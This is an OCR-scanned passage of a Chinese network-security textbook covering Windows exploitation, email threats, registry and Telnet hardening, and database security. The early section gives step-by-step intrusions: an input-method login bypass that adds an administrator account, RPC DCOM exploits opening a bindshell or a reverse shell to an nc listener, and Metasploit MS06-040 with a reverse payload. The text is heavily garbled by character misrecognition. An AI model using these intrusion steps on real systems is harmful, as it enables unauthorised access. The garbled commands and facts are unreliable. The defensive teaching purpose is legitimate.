应 用 程序 配置 里 面 的 “ISAPI” 应 用 程序 、 禁 止 脚本 测试 等 。 

(4) 设置 安全 日 志 ， 并 把 该 日 志 存在 一 个 不 显眼 的 路 径 下 。 

(5) 安装 网 络 防火 墙 ， 并 禁用 除 80 端口 以 外 所 有 端口 的 内 外 通信 连接 。 

(6) 经 常备 份 ， 并 把 备份 文件 存储 在 男 一 台 计 算 机 上 。 

7. Windows 经 典 漏洞 

1) “中 文 输入 法 漏洞 

如 果 对 方 开放 了 3389， 则 可 以 通过 其 帮助 文件 进入 系统 而 绕 过 验证 。 

首先 扫描 3389 端口 ，SFind 工具 ， 格 式 : sfind -p 3389 192.168.254.2 192.168.254.254， 
-了 是 指定 扫描 端口 ， 前 一 个 是 开始 地 址 ， 后 一 个 是 终止 地 址 。 

然后 使 用 工具 mstsc 连接 ， 到 用 户 名 ， 密 码 ， 验 证 的 步 又， 再 切换 至 中 文 输入 法 ， 再 
右 击 指南 的 左上 角 图 标 ， 跳 至 URL， 输 入 ci\winnt\system32， 找 到 netexe。 

创建 一 个 快捷 方式 , 属性 , 然后 在 目标 一 栏 中 输入 :netexe user aaa 123 /add, 添加 账户 ， 
确定 ， 右 击 打 开 ， 执 行 ， 同 样 可 以 输入 etexe localgroup administrator aaa /add 添加 至 管理 
员 组 ， 确 定 打开 ， 然 后 使 用 刚才 的 用 户 登 录 。 

2) ”RPC 漏洞 

使 用 X-Scan 扫描 ， 可 以 下 载 DComRPC.xpn 插件 放 入 X-Scan 的 plugin 目录 中 ， 生 
打开 X-Scan， 可 以 扫描 了 PC。 
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使 用 Retina(R)-DCOM Scanner 扫描 专用 的 RPC 漏洞 。 

使 用 命令 行 下 的 工具 mpc_locator 格式 : Ipc_locator< 开 始 卫 >< 技 术 IP>。 

使 用 工具 : Rpcdcom 和 OpenRpcss。Rpcdcom 格式 为 Rpcdcom Server; OpenRpcss 格 
式 为 OpenRpcss \\Server。 

先 使 用 Rpcdcom 发 送 数据 ， 如 Rpcdcom 192.168.254.128， 再 用 OpenRpcss 建立 账号 : 
OpenRpcss\192.168.254.128, 或 者 OpenRpcss.exe\192.168.254.128 用 户 名 在 屏幕 下 有 提示 ， 
dcom 有 两 种 方式 连接 : 主动 和 被 动 连接 。 

方法 : docm -d <host>[options]。 

参数 意义 如 下 。 

d: 远程 主机 IP( 必 用 参数 )。 
系统 类 型 (0 是 Windows 2000，1 是 Windows XP)。 
返回 地 址 。 

: 攻击 远程 主机 端口 。 

Z Bindshell 端口 (默认 666)。 
反弹 连接 IP。 

反弹 连接 端口 。 

方式 1: 入 侵 者 连接 目标 ，dcom-d 192.168.254.128 等 价 于 dcom -d 192.168.254.128 -t0 
P135 -1666， 之 后 就 可 疑 telnet 192.168.254.128 666，nc 或 者 cmd。 

方式 2: 远程 主机 主动 连接 入 侵 者 ， 先 用 nc 打开 本 地 端口 监听 : nc -1-p 250。 

再 用 dcom, dcom -d 192.168.254.128 -h 192.168.254.129-P 2530， 浇 出 后 ，nec 的 窗口 会 显 
示 进 入 了 对 方 的 根 目 录 ， 一般 用 80 端口 以 减 小 暴露 的 机 会 。254.128 是 对 方 ，254.129 是 本 
机 。 

3) ”RPC 接口 远程 任意 代码 可 执行 漏洞 

利用 工具 : ms06049.exe。 

打开 cmd 切换 到 工具 所 在 目录 ， 执 行 即 可 在 本 机 建立 一 个 管理 员 账 号 ， 可 以 提 权 ， 需 
要 把 此 工具 植 入 远程 主机 。 

4) ”Server 服务 远程 缓冲 区 溢出 漏洞 (MS06-040) 

扫描 : RetinaNetApi.exe。 

利用 : Metasploit( 一 款 集 众多 漏洞 于 一 体 的 软件 包 )。 

安装 完成 后 ， 在 程序 目录 中 有 cygwin.bat, msfconsole.bat, msfupdate.bat, msfweb.bat 4 
个 批 处 理 文件 ， 先 打开 msfupdate.bat 更 新 exp 完毕 后 ， 运 行 msfconsole.bat， 输 入 show 
exploits 查看 有 哪些 溢出 程序 。 

输入 use netapi ms06_040 使 用 MS06-040 溢出 程序 ; 

输入 show payloads 显示 可 用 的 shellcode 列表 ， 如 使 用 : win32_reverse; 

输入 set PAYLOAD win32_reverse, 设 置 PAYLOAD 为 win32_reverse; 

输入 set RHOST 211.234.*.* 来 设置 要 攻击 的 主机 IP 指 (Remote Host); 

输入 set LHOST 121.*.*.* 设 置 本 机 卫 指 (Local Hosb; 

输入 set TARGET 0 设置 溢出 类 型 ; 

输入 set 检查 输入 的 信息 ; 
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输入 exploit 开始 溢出 , 成 功 后 可 以 通过 445 端口 发 送 shellcode 获得 一 个 具有 管理 员 权 
限 的 交互 式 shell。 

解决 方案 : 安装 补丁 ， 关 闭 139，445， 使 用 防火 墙 ， 启 用 高 级 TCP/IP 过 滤 ， 用 了 PSec 
阻 断 端口 。 


3.2.2 ”基于 电子 邮件 服务 攻击 的 防护 方法 


电子 邮件 是 当今 世界 上 使 用 最 频繁 的 商务 通信 工具 ， 电 子 邮 件 的 持续 升温 使 之 成 为 那 
些 企图 进行 破坏 的 人 所 日 益 关注 的 目标 。 如 今 ， 黑 客 和 病毒 撰写 者 不 断 开 发 新 的 和 有 创意 
性 的 方法 ， 以 期 战胜 安全 系统 中 的 改进 措施 。 

典型 的 Internet 通信 协议 TCP 和 UDP, 其 开放 性 常常 引 来 黑客 的 攻击 。 而 IP 地 址 的 脆 
弱 性 ， 也 给 黑客 的 伪造 提供 了 可 能 ， 从 而 泄露 远程 服务 器 的 资源 信息 。 很 多 电子 邮件 网 关 ， 
如 果 电 子 邮 件 地 址 不 存在 ， 系 统 则 回复 发 件 人 ， 并 通知 他 们 这 些 电 子 邮 件 无 效 。 黑 客 利用 
电子 邮件 系统 的 这 种 内 在 “礼貌 性 ”来 访问 有 效 地 址 ， 并 添加 到 其 合法 地 址 数据 库 中 。 

防火 墙 只 控制 基于 网 络 的 连接 , 通过 标准 电子 邮件 端口 (25 端口 ) 的 通信 进行 详细 审查 。 
一 旦 企业 选择 了 某 一 邮件 服务 器 ， 它 基本 上 就 会 一 直 使 用 该 品牌 ， 因 为 主要 的 服务 器 平台 
之 间 不 具备 相互 操作 性 。 下 面 介绍 一 些 广为人知 的 漏洞 。 

(1) IMAP 和 POP 漏洞 一 一 密码 脆弱 是 这 些 协议 的 常见 弱点 。 各 种 IMAP 和 POP 服务 
容易 受到 如 缓冲 区 溢出 等 类 型 的 攻击 。 

(2) 拒绝 服务 (DOS) 攻 击 。 

@ 死亡 之 ping 一 发送 一 个 无 效 数据 片段 ， 该 片段 始 于 包 结尾 之 前 ， 但 止 于 包 结 尾 
之 后 。 

@@， 同步 攻击 一 一 极 快 地 发 送 TCP SYN 包 ( 它 会 启动 连接 )， 使 受 攻击 的 机 器 耗 尽 系统 
资源 ， 进 而 中 断 合法 连接 。 

图 ”循环 一 一 发 送 一 个 带 有 完全 相同 的 源 /目的 地 址 /端口 的 伪造 SYN 包 ， 使 系统 陷入 
一 个 试图 完成 TCP 连接 的 无 限 循 环 中 。 

(3) 系统 配置 漏洞 一 一 企业 系统 配置 中 的 漏洞 可 以 分 为 以 下 几 类 。 

@ 默认 配置 一 大 多 数 系统 在 交付 给 客户 时 都 设置 了 易于 使 用 的 默认 配置 ， 使 黑客 
盗用 变 得 轻松 。 

@ 空 的 /默认 根 密码 一 一 许多 机 器 都 配置 了 空 的 或 默认 的 根 / 管 理 员 密码 , 并 且 其 数量 
多 得 惊人 。 

@ ”漏洞 创建 一 一 几乎 所 有 程序 都 可 以 配置 为 在 不 安全 的 模式 下 运行 ， 这 会 在 系统 上 
留 下 不 必要 的 漏洞 。 

(4) 利用 软件 问题 一 -在 服务 器 守护 程序 、 客 户 端 应 用 程序 、 操 作 系 统 和 网 络 堆栈 中 ， 
存在 很 多 的 软件 错误 ， 分 为 以 下 几 类 。 

@ 缓冲 区 溢出 一 一 程序 员 会 留 出 一 定数 目的 字符 空间 来 容纳 登录 用 户 名 ， 黑 客 则 会 
通过 发 送 比 指定 字符 串 长 的 字符 串 ， 其 中 包括 服务 器 要 执行 的 代码 ， 使 之 发 生 数 据 溢 出 
造成 系统 入 侵 。 

@ 意外 组 合 一 一 程序 通常 是 用 很 多 层 代 码 构造 而 成 的 ， 入 侵 者 可 能 会 经 常 发 送 一 些 
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对 于 某 一 层 毫 无 意义 ， 但 经 过 适当 构造 后 对 其 他 层 有 意义 的 输入 。 

@ 未 处 理 的 输入 一 一 大 多 数 程序 员 都 不 考虑 输入 不 符合 规范 的 信息 时 会 发 生 什么 
后 果 。 

(5) 利用 人 为 因素 一 一 攻击 者 使 用 高 级 手段 使 用 户 打 开 电 子 邮 件 附件 的 例子 ， 包 括 双 
扩展 名 、 密 码 保护 的 Zip 文件 、 文 本 欺骗 等 。 

(6) 特洛伊 木马 及 自我 传播 一 结合 特洛伊 木马 和 传统 病毒 的 混合 攻击 正 日 益 猩 狐 。 
攻击 者 所 使 用 的 特洛伊 木马 的 常见 类 型 有 以 下 几 种 。 

@ 远程 访问 一 过去， 特洛伊 木马 只 会 侦 听 对 黑客 可 用 的 端口 上 的 连接 。 而 现在 特 
洛 伊 木马 则 会 通知 黑客 ， 使 黑客 能 够 访问 防火 墙 后 的 机 器 。 有 些 特洛伊 木马 可 以 通过 IRC 
命令 进行 通信 ， 这 表示 从 不 建立 真实 的 TCP/P 连接 。 

@@ 数据 发 送 一 将 信息 发 送 给 黑客 。 方 法 包括 记录 按键 、 搜 索 密 码 文件 和 其 他 秘密 
信息 。 

图 ”破坏 一 破坏 和 删除 文件 。 

@ ”拒绝 服务 一 使 远程 黑客 能 够 使 用 多 个 僵尸 计算 机 启动 分 布 式 拒绝 服务 (DDoS) 
攻击 。 

回 ”代理 一 指 在 将 受害 者 的 计算 机 变 为 对 黑客 可 用 的 代理 服务 器 。 是 匿名 的 Telnet、 
ICQ、IRC 等 系统 用 户 可 以 使 用 窃 得 的 信用 卡 购 物 , 并 在 黑客 追踪 返回 到 受 感染 的 计算 机 时 ， 
使 黑客 能 够 完全 隐匿 其 名 。 

由 于 企业 日 益 依赖 于 电子 邮件 系统 ， 它 们 必须 解决 电子 邮件 传播 的 攻击 和 易 受 攻击 的 
电子 邮件 这 两 种 攻击 的 问题 。 解 决 方法 有 以 下 三 种 。 

第 一 ， 在 电子 邮件 系统 周围 锁定 电子 邮件 系统 一 一 电子 邮件 系统 周边 控制 开始 于 电子 
邮件 网 关 的 部 署 。 电 子 邮 件 网 关 应 根据 特定 目的 与 加 固 的 操作 系统 和 防止 网 关 受 到 威胁 的 
入 侵 检测 功能 一 起 构建 。 

第 二 ， 确 保 外 部 系统 访问 的 安全 性 一 一 电子 邮件 安全 网 关 必 须 负 责 处 理 来 自 所 有 外 部 
系统 的 通信 ， 并 确保 通过 的 信息 流量 是 合法 的 。 通 过 确保 外 部 访问 的 安全 ， 可 以 防止 入 侵 
者 利用 Web 邮件 等 应 用 程序 访问 内 部 系统 。 

第 三 ， 实 时 监视 电子 邮件 流量 一 一 实时 监视 电子 邮件 流量 对 于 防止 黑客 利用 电子 邮件 
访问 内 部 系统 是 至 关 重 要 的 。 检 测 电子 邮件 中 的 攻击 和 漏洞 攻击 (如 畸形 MIME) 需 要 持续 监 
视 所 有 的 电子 邮件 。 

在 上 述 安全 保障 的 基础 上 ， 电 子 邮件 安全 网 关 应 简化 管理 员 的 工作 ， 能 够 轻松 集成 并 
被 使 用 者 轻松 配置 。 


3.2.3 ”注册 表 入 侵 的 防护 方法 


注册 表 是 Windows 用 来 管理 配置 系统 运行 参数 的 一 个 核心 数据 库 。 在 这 个 数据 库 里 整 
合集 成 了 全 部 系统 和 应 用 程序 的 初始 化 信息 ， 其 中 包含 了 硬件 设备 的 说 明 、 相 互 关联 的 应 
用 程序 与 文档 文件 、 窗 口 显 示 方 式 、 网 络 连接 参数 ， 甚 至 有 关系 到 计算 机 安全 的 网 络 共享 
设备 。 它 与 原来 Win32 系统 里 的 .ini 文件 相 比 ， 具 有 方便 管理 、 安 全 性 较 高 、 适 于 网 络 操 
作 等 特点 。 如 果 注 册 表 受到 了 破坏 ， 轻 者 是 Windows 的 启动 过 程 出 现 异 常 ， 重 者 可 能 会 导 
致 整个 Windows 系统 瘫痪 。 用 户 通过 注册 表 可 以 轻易 地 添加 、 删 除 、 修 改 系统 内 的 软件 配 
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置信 息 或 硬件 驱动 程序 ， 大 大 方便 了 用 户 对 软件 的 工作 状态 所 进行 的 调整 。 与 此 同时 ， 入 
侵 者 也 经 常 通过 注册 表 来 种 植木 马 、 修 改 软件 信息 ， 甚 至 删除 、 停 用 或 改变 硬件 的 工作 

首先 了 解 一 下 注册 表 的 基本 知识 。 在 “运行 ”对 话 框 中 输入 “regedit”， 然后 单 击 “ 确 
定 ” 按 钮 ， 就 可 以 运行 注册 表 编辑 器 。 在 注册 表 中 ， 所 有 的 数据 都 是 通过 一 种 树 状 分 层 结 
构 来 组 织 的 ， 由 子 树 及 项 、 子 项 和 项 值 组 成 ， 十 分 类 似 于 目录 结构 。 通 过 图 3-6、 表 3-1、 
表 3-2 可 以 基本 了 解 它 的 相关 知识 。 
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图 3-6 注册 表 的 分 层 结构 
表 3-1 注册 表 根 项 名 称 说 明 


根 项 名 称 说 明 

包含 关于 本 地 计算 机 系统 的 信息 , 包括 硬件 和 操作 系统 数据 ,如 总 线 类 
型 、 系 统 内 存 、 设 备 驱动 程序 和 启动 控制 数据 

包含 有 各 种 OLE 技术 使 用 的 信息 和 文件 类 别 关 联 数据 。 如 果 
HRKEY LOCAL MACHINE(HKEY_ CURRENT USER)SOFTWARE\Classes 
中 存在 某 个 键 或 值 , 则 对 应 的 键 或 值 将 出 现在 HREY_CLASSES_ ROOT 
中 。 如 果 两 处 均 存 键 或 值 ， HKEY_CURRENT USER 版 本 将 是 出 现在 
HKEY_ CLASSES ROOT 中 的 一 个 


HKEY_ LOCAL MACHINE 


HKEY_ CLASSES_ ROOT 


包含 当前 以 交互 方式 (与 远程 方式 相反 ) 登 录 的 用 户 的 用 户 配 置 文件 , 包 
括 环境 变量 、 桌 面 设置 、 网 络 连接 、 打 印 机 和 程序 首选 项 。 该 子 目 录 树 
是 HKEY USERS 子 目 录 的 别名 , 并 指向 HKEY_USERS\ 当 前 用 户 的 安 
全 ID 


HKEY_CURRENT USER 
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续 表 
根 项 名 称 说 明 
包含 关于 动态 加 载 的 用 户 配置 文件 和 默认 配置 文件 的 信息 。 包 含 同时 出 
RS 现在 HREY_ CURRENT USER 中 的 信息 。 要 远程 访问 服务 器 的 用 户 在 


服务 器 上 的 该 项 下 没有 配置 文件 , 他 们 的 配置 文件 将 加 载 到 他 们 自己 的 
计算 机 的 注册 表 中 

包含 在 启动 时 由 本 地 计算 机 系统 使 用 的 硬件 配置 文件 的 相关 信息 。 该 信 
息 用 于 配置 一 些 设置 , 如 要 加 载 的 设备 驱动 程序 和 显示 时 要 使 用 的 分 辨 
率 。 该 子 目录 树 是 HKEY_LOCAL MACHINE 子 目录 树 的 一 部 分 ， 并 
指向 HEKY LOCAL MACHINE\SYSTEM\CurrentContorSet\HardwareProfiles\ 
Current 


HKEY CURRENT CONFIG 


表 3-2 注册 表 数 据 类 型 说 明 


数据 类 型 说 明 
未 处 理 的 二 进 制 数据 。 二 进 制 是 没有 长 度 限制 的 ， 可 以 是 任意 个 字 节 的 长 度 。 
多 数 硬件 组 件 信息 都 以 二 进 制 数据 存储 , 而 以 十 六 进 制 格式 显示 在 注册 表 编 辑 


ee 器 中 。 如 “CustomColors” 的 键 值 就 是 一 个 二 进 制 数据 , 双击 键 值 名 , 出 现 “ 编 
辑 一 进 制 数值 对话 杠 
数据 由 4 字 节 (32 位 ) 长 度 的 数 表 示 。 许多 设备 驱动 程序 和 服务 的 参数 都 是 这 种 
REG DWORD 


类 型 ， 并 在 注册 表 编 辑 器 中 以 二 进 制 、 十 六 进 制 或 十 进 制 的 格式 显示 

长 度 可 变 的 数据 串 ， 一 般 用 来 表示 文件 的 描述 、 硬 件 的 标识 等 ,通常 由 字母 和 
数字 组 成 ， 最 大 长 度 不 能 超过 255 个 字符 

多 个 字符 串 。 其 中 格式 可 被 用 户 读 取 的 列表 或 多 值 。 常 用 空格 、 喜 号 或 其 他 标 
记分 开 

REG SZ 固定 长 度 的 文本 串 

REG FULL RESOU 
RCE_DESCRIPTOR 


REG EXPAND SZ 


REG MULTI SZ 


设计 用 来 存储 硬件 元 件 或 驱动 程序 的 资源 列表 的 一 系列 嵌 套 数组 


由 于 入 侵 者 可 以 通过 注册 表 来 种 植木 马 、 修 改 软件 信息 ， 甚 至 删除 、 停 用 或 改变 硬件 
的 工作 状态 ， 因 此 对 注册 表 的 防护 就 显得 尤其 重要 。 可 以 通过 以 下 两 种 方法 增强 注册 表 的 
安全 性 。 


1. 禁止 使 用 注册 表 编 辑 器 


入 侵 者 通常 是 通过 远程 登录 “注册 表 编 辑 器 ”修改 注册 表 的 ， 可 以 通过 修改 注册 表 设 
置 禁止 注册 表 编辑 器 。 打 开 “ 注 册 表 编辑 器 ”窗口 ， 从 左 侧 栏 中 依次 展开 “HKEY_CURRENT 
USER\Software\Microsoft\Windows\CurrentVersion\Policies\System” 子 项 ， 在 右 侧 栏 中 找到 
或 新 建 一 个 DWORD 值 类 型 的 名 为 “Disableregistrytools” 的 选项 ， 将 其 值 改 为 1。 关 闭 注 
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册 表 ， 再 次 打开 注册 表 编 辑 器 时 ， 将 会 弹出 禁止 修改 的 提示 框 。 

然而 禁止 别人 使 用 注册 表 编辑 器 的 同时 ， 自 己 也 没 法 使 用 了 ， 可 以 通过 以 下 方法 恢复 
禁用 的 注册 表 编 辑 器 。 

方法 一 : 打开 一 个 “记事 本 ”文件 ， 如 果 计 算 机 的 操作 系统 是 Windows 2000\XP， 在 
其 中 输入 如 下 代码 。 


Windows Registry Editor Version 5.00 

[HKEY CURRENT USER\Software\Microsoft\Windows\CurrentVersion\Policies\Sy 
stem] 

"Disableregistrytools"=dword:00000000 


将 文件 保存 为 名 为 “Unlock.reg” 的 注册 表 文件 。 双 击 运 行 该 文件 ， 即 可 将 该 文件 导入 
到 注册 表 中 ， 然 后 使 用 常规 打开 注册 表 编 辑 器 的 方法 就 可 以 重新 打开 注册 表 编 辑 器 了 。 

方法 二 : 在 Windows 2000\XP\2003 系统 中 ， 从 “开始 ”菜单 中 选择 “运行 ”， 在 弹出 
的 “运行 ”对 话 框 中 输入 Gpedit.msc， 单 击 “ 确 定 ” 按 钮 ， 即 可 弹出 “组 策略 ”对 话 框 (如 
图 3-7 所 示 )。 从 左 侧 栏 中 依次 选择 “用 户 配 置 ”一 “管理 模板 ”一 “系统 ”选项 ， 在 右 侧 
栏 中 双击 “阻止 访问 注册 表 编辑 工具 ”， 可 以 打开 “阻止 访问 注册 表 编 辑 工具 属性 ”对 话 
框 ， 选 中 “已 禁用 ” 单 选 按 钮 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 恢复 禁用 的 注册 表 编 辑 器 ， 如 
图 3-8 所 示 。 


文件 中” 折 作 () 查看 WD 帮助 oD 
+ 加 困 多 四 
Er 第 略 


Fri 
EC 1 选项 
自 于 了 
es 
电源 芝 理 
a [es 


各 软件 设置 
+ 中 国 riniors 设置 
日 咎 管理 模板 


出 国 indovs 组 件 
加 任务 栏 和 [开始 ] 菜单 
由 国史 面 


Yindors 自动 更 新 
角 关 闭 Tindors Update 设备 红 动 程序 搜索 提示 


\ 玫 展 入 标准 / 
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3-8 “阻止 访问 注册 表 编 辑 工具 属性 ”对 话 框 
2. 删除 “远程 注册 表 服 务 ”(Remote Registry Service) 


入 侵 者 远程 入 侵 注册 表 需 要 启用 “远程 注册 表 服 务 ”， 因 此 为 了 阻止 黑客 的 入 侵 ， 可 
以 将 该 服务 删除 。 方 法 是 找到 注册 表 中 HREY _ LOCAL MACHINE\SYSTEMNCurrentContorSet\ 
Services 下 的 RemoteRegistry 项 ， 在 其 上 右 击 ， 选 择 “ 删 除 ” 选项， 将 该 项 删除 后 就 无 法 启 
动 该 服务 了 ， 即 使 我 们 通过 在 “控制 面板 ”一 “管理 工具 ”一 “服务 ”中 启动 也 会 出 现 相 
应 的 错误 提示 ， 根 本 无 法 启动 该 服务 。 

不 过 需要 注意 的 是 ， 对 于 注册 表 的 修改 一 定 要 谨慎， 在 修改 前 一 定 要 将 该 项 信息 导出 
并 保存 。 以 后 再 想 使 用 该 服务 时 只 需 将 已 经 保存 的 注册 表 文件 导入 即 可 。 另 外 如 果 觉 得 将 
服务 删除 不 安全 的 话 还 可 以 将 其 改名 ， 也 可 以 起 到 一 定 的 防护 作用 。 


3.2.4 Telnet 入 侵 的 防护 方法 


Telnet 用 于 Internet 的 远程 登录 , 它 可 以 使 用 户 坐 在 已 上 网 的 计算 机 前 通过 网 络 进入 另 
一 台 己 上 网 的 计算 机 ， 使 它们 相互 通信 ， 这 种 连通 可 以 发 生 在 同一 房间 里 的 计算 机 或 是 在 
世界 各 范围 内 已 上 网 的 计算 机 。 习 惯 来 说 ， 被 连通 并 且 为 网 路 上 所 有 用 户 提供 服务 的 计算 
机 称 为 服务 器 (Servers)， 而 自己 正在 使 用 的 机 器 称 为 客户 机 (Customer)。 一 旦 连通 后 ， 客 户 
机 可 以 享有 服务 器 所 提供 的 一 切 服 务 。 用 户 可 以 运行 通常 的 交互 过 程 (注册 进入 、 执 行 命 
令 )， 也 可 以 进入 很 多 特殊 的 服务 器 ， 如 寻找 图 书 索 引 。 网 上 不 同 的 主机 提供 的 各 种 服务 都 
可 以 被 使 用 。 

Telnet 可 以 用 于 进行 各 种 各 样 的 入 侵 活动 ， 或 者 用 来 剔除 远程 主机 发 送 来 的 信息 。 在 
运行 网 络 并 为 用 户 提供 Telnet 服务 时 , 还 是 小 心 点 为 好 , 尤其 对 那些 新 建 的 Telnet 服务 器 ， 
其 中 可 能 含有 未 被 发 现 的 “臭虫 bug)”。 同 时 ， 因 为 Telnet 具有 很 强 的 交互 性 并 且 向 用 户 
提供 了 在 远程 主机 上 执行 命令 的 功能 ，Telnet 上 的 任何 漏洞 都 可 能 是 致命 的 。 在 这 一 点 上 
至 少 同 FTP 和 HTTP 一 样 ， 甚 至 还 会 更 糟 。 一 旦 入 侵 者 与 远程 主机 建立 了 Telnet 连接 ， 入 
侵 者 便 可 以 使 用 目标 主机 上 的 软 硬 件 资源 ， 而 入 侵 者 的 本 地 机 只 相当 于 一 个 只 有 键盘 和 显 
示 器 的 终端 而 已 。 

Telnet 的 入 侵 对 计算 机 的 危害 性 比较 大 ， 为 了 防止 黑客 通过 Telnet 入 侵 计算 机 ， 我 
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们 通常 会 禁用 Telnet 服务 。 然 而 入 侵 者 可 以 先 与 远程 计算 机 建立 空 连接 ,然后 远程 开启 
Telnet 服务 。 因 此 防护 Telnet 入 侵 ， 除 了 禁用 Telnet 服务 之 外 ， 还 要 防范 IPC 漏洞 ， 禁 用 
建立 空 连接 ， 首 先 运行 regedit， 打 开 注 册 表 编辑 器 ， 找 到 子 项 : HKEY LOCAL MACHINE\ 
SYSTEM\ CurrentContorSet\ControILSA， 把 RestrictAnonymous=DWORD 的 键 值 改 为 : 
00000001。 


3.3 ”SQL 数据 库 安全 


数据 库 在 各 种 系统 中 都 应 用 得 非常 广泛 , 在 本 地 网 的 网 管 系统 中 更 是 系统 的 关键 部 分 ， 
在 办 公 自 动 化 系统 、 管 理 信息 系统 及 电子 商务 中 ， 数 据 库 都 是 重要 的 组 成 部 分 ， 因 此 ， 往 
往 成 为 非法 入 侵 者 攻击 的 焦点 。 如 何 保证 和 加 强 数据 库 的 安全 性 、 保 密 性 ， 已 成 为 数据 库 
管理 员 关心 的 首要 问题 之 一 。 


3.3.1 数据 库 系统 概述 


数据 库 系统 ， 一 般 可 以 理解 成 两 部 分 : 一 部 分 是 数据 库 ， 按 一 定 的 方式 存 取 数 据 ; 另 
一 部 分 是 数据 库 管理 系统 (DBMS)， 为 用 户 及 应 用 程序 提供 数据 访问 ， 并 具有 对 数据 库 进 行 
管理 、 维 护 等 多 种 功能 。 


1. 数据 库 系统 安全 


数据 库 系统 包含 以 下 两 层 含义 。 

第 一 层 是 指 系统 运行 安全 ， 它 包含 : 法 律 、 政 策 的 保护 ， 如 用 户 是 否 有 合法 权利 、 政 
策 是 否 人 允许 等 ， 物 理 控制 安全 ， 如 机 房 加 锁 等 ;硬件 运行 安全 ， 操 作 系统 安全 ， 如 数据 文 
件 是 否 保护 等 灾害、 故障 恢复 ; 死 锁 的 避免 和 解除 ， 电 磁 信 息 泄露 防止 。 

第 二 层 是 指 系统 信息 安全 ， 它 包括 : 用 户口 令 字 鉴别 ; 用 户 存 取 权限 控制 ; 数据 存 取 
权限 、 方 式 控制 ; 审计 跟踪 ;数据 加 密 。 

2. 数据 库 系统 安全 特性 


1) “数据 独立 性 

数据 独立 于 应 用 程序 之 外 。 理 论 上 数据 库 系统 的 数据 独立 性 分 为 以 下 两 种 。 

(1) 物理 独立 性 。 

数据 库 的 物理 结构 的 变化 不 影响 数据 库 的 应 用 结构 ， 从 而 也 就 不 能 影响 其 相应 的 应 用 
程序 。 这 里 的 物理 结构 是 指数 据 库 的 物理 位 置 、 物 理 设备 等 。 

(2) 逻辑 独立 性 。 

数据 库 逻 辑 结构 的 变化 不 会 影响 用 户 的 应 用 程序 ， 数 据 类 型 的 修改 、 增 加 、 改 变 各 表 
之 间 的 联系 都 不 会 导致 应 用 程序 的 修改 。 

这 两 种 数据 独立 性 都 要 靠 DBMS 来 实现 。 到 目前 为 止 ， 物 理 独立 性 已 经 能 基本 实现 ， 
但 逻辑 独立 性 实现 起 来 非常 困难 ， 数 据 结构 一 旦 发 生变 化 ， 一 般 情 况 下 相应 的 应 用 程序 都 
要 作 或 多 或 少 的 修改 。 追 求 这 一 目标 也 成 为 数据 库 系统 结构 复杂 的 一 个 重要 原因 。 


中 蓝 了 章 大 纺 钴 务 与 红 府 库 安 全 


2) ”数据 安全 性 

一 个 数据 库 能 否 实现 防止 无 关 人 员 得 到 他 不 应 该 知道 的 数据 ， 是 数据 库 是 否 实用 的 一 
个 重要 指标 。 如 果 一 个 数据 库 对 所 有 的 人 都 要 公开 数据 ， 那 么 这 个 数据 库 就 不 是 一 个 可 靠 
的 数据 库 。 一 般 情况 下 ， 比 较 完整 的 数据 库 对 数据 安全 性 采取 以 下 措施 。 

(1) 将 数据 库 中 需要 保护 的 部 分 与 其 他 部 分 相隔 离 。 

(2) 使 用 授权 规则 。 这 是 数据 库 系 统 经 常 使 用 的 一 个 办 法 ， 数 据 库 给 用 户 ID 号 和 口 
令 、 权 限 。 当 用 户 用 此 ID 号 和 口令 登录 后 ， 就 会 获得 相应 的 权限 。 不 同 的 用 户 或 操作 会 有 
不 同 的 权限 。 比 如 ， 对 于 一 个 表 ， 某 人 有 修改 权 ， 而 其 他 人 只 有 查询 权 。 

G) 将 数据 加 密 ， 以 密 文 的 形式 存 于 数据 库 内 。 

3) ”数据 的 完整 性 

数据 完整 性 这 一 术语 用 来 泛 指 与 损坏 和 丢失 相对 的 数据 状态 。 它 通常 标明 数据 在 可 靠 
性 与 准确 性 上 是 可 信赖 的 ， 同 时 也 意味 着 数据 有 可 能 是 无 效 的 或 不 完整 的 。 数 据 完整 性 包 
括 数据 的 正确 性 、 有 效 性 和 一 致 性 。 

(1) 正确 性 。 

数据 在 输入 时 要 保证 其 输入 值 与 定义 这 个 表 时 相应 的 域 的 类 型 一 致 。 如 表 中 的 某 个 字 
段 为 数值 型 ， 那 么 它 只 能 允许 用 户 输入 数值 型 的 数据 ， 否 则 不 能 保证 数据 库 的 正确 性 。 

(2) 有 效 性 。 

在 保证 数据 正确 的 前 提 下 ， 系 统 还 要 约束 数据 的 有 效 性 。 例 如 : 对 于 月 份 字 段 ， 若 输 
入 值 为 0， 那 么 这 个 数据 就 是 无 效 数据 ， 这 种 无 效 输入 也 称 为 “垃圾 输入 ”。 当 然 ， 若 数 
据 库 输出 的 数据 是 无 效 的， 相应 称 为 “垃圾 输出 ”。 

G) 一致 性 。 

当 不 同 的 用 户 使 用 数据 库 ， 应 该 保证 他 们 取出 的 数据 必须 一 致 。 因 为 数据 库 系 统 对 数 
据 的 使 用 是 集中 控制 的 ， 因 此 数据 的 完整 性 控制 还 是 比较 容易 实现 的 。 

4) ”并 发 控制 

如 果 数 据 库 应 用 要 实现 多 用 户 共享 数据 ， 就 可 能 在 同一 时 刻 多 个 用 户 要 存 取 数据 ， 这 
种 事件 叫 作 并 发 事件 。 当 一 个 用 户 取出 数据 进行 修改 ， 在 修改 存 入 数据 库 之 前 如 有 其 他 用 
户 再 取 此 数据 ， 那 么 读 出 的 数据 就 是 不 正确 的 。 这 时 就 需要 对 这 种 并 发 操作 实行 控制 ， 排 
除 和 避免 错误 的 发 生 ， 保 证 数据 的 正确 性 。 

5) ”故障 恢复 

当 数 据 库 系 统 在 运行 中 出 现 物 理 或 逻辑 上 的 错误 时 ， 如 何 尽快 将 它 恢复 正常 ， 这 就 是 
数据 库 系 统 的 故障 恢复 功能 。 


3.3.2 ”SQL 服务 器 的 发 展 


1970 年 6 月 ，E.F.Dodd 博士 发 表 “A Relational Mode of Data for Large Shared Data 
Banks” 论 文 , 提出 关系 模型 。1979 年 6 月 12 日 , Oracle 公司 (当时 还 叫 Relational Software) 
发 布 了 第 一 个 商用 SQL 关系 数据 库 。1987 年 Microsoft、Sybase 和 Ashton-Tate 三 家 公司 共 
同 开发 了 Sybase SQL Server。1988 年 ，Microsoft、Sybase 和 Ashton-Tate 三 家 公司 把 该 产 
品 移植 到 OS\2 上 。 后 来 Aston-Tate 公司 退出 了 该 产品 的 开发 ， 而 Microsoft 公司 和 Sybase 
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公司 则 签署 了 一 项 共同 开发 协议 ,这 两 家 公司 的 共同 开发 的 结果 是 发 布 了 用 于 Windows NT 
